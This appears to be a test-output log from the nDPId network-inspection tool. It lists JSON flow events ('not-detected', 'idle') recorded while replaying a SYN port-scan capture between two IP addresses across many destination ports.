+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3260,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 